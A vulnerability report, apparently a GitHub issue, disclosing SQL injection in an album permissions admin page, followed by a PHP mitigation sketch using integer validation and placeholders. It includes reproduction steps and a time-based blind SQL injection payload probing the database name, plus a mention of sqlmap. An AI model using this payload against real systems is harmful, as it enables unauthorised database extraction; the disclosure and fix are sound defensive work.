
SQL injection in user/group permissions manager #1011

Closed
@zongdeiqianxing

Description

Hi, I found two new vulnerabilities in admin/user_perm.php and admin/group_perm.php.

1:
Request http://xx.xx.xx.xx/admin.php?page=user_perm&user_id=1 (need to have a private album),
then move the album from the right to the left.
Payload: 1 and if(ascii(substr(database(),1,1))>97,1,sleep(5)) or use 'sqlmap'

2:
Same as the first: request /admin.php?page=user_perm&user_id=1 (need to have a private album),
then move the album from the right to the left.
Payload: 1 and if(ascii(substr(database(),1,1))>97,1,sleep(5)) or use 'sqlmap'
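A mitigation sketch for the class of bug reported above, added here as an example and not taken from the project's code: it assumes the injectable value is the list of album IDs submitted when an album is moved between the two lists. The function names and the table and column names (`parse_album_ids`, `build_revoke`, `example_user_album_access`, `album_id`) are hypothetical.

```php
<?php
declare(strict_types=1);

// Added example, not the project's code. All names below are hypothetical.

/** Accept only decimal album IDs; anything else is rejected, not "cleaned". */
function parse_album_ids(array $raw): array
{
    $ids = [];
    foreach ($raw as $value) {
        // ctype_digit() is false for '', spaces, signs and SQL keywords,
        // so a string such as "1 and if(...)" never reaches the query.
        if (!is_string($value) || !ctype_digit($value) || strlen($value) > 10) {
            throw new InvalidArgumentException('album id must be a positive integer');
        }
        $ids[] = (int) $value;
    }
    return array_values(array_unique($ids));
}

/** Build a statement with one placeholder per ID; values travel separately. */
function build_revoke(int $userId, array $ids): array
{
    if ($ids === []) {
        return [null, []]; // nothing to do, never emit "IN ()"
    }
    $marks = implode(',', array_fill(0, count($ids), '?'));
    $sql = "DELETE FROM example_user_album_access WHERE user_id = ? AND album_id IN ($marks)";
    return [$sql, array_merge([$userId], $ids)];
}

// Constructed sample inputs: a normal submission, then the payload from the report.
$samples = [
    ['3', '7'],
    ['1 and if(ascii(substr(database(),1,1))>97,1,sleep(5))'],
];
foreach ($samples as $posted) {
    try {
        [$sql, $params] = build_revoke(1, parse_album_ids($posted));
        // With PDO this would run as: $pdo->prepare($sql)->execute($params);
        echo $sql, ' -- ', json_encode($params), PHP_EOL;
    } catch (InvalidArgumentException $e) {
        echo 'rejected: ', $e->getMessage(), PHP_EOL;
    }
}
```

Validation and placeholders are both applied on purpose: the integer check stops malformed input early, and the bound parameters keep the query safe even if a later code path skips the check.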
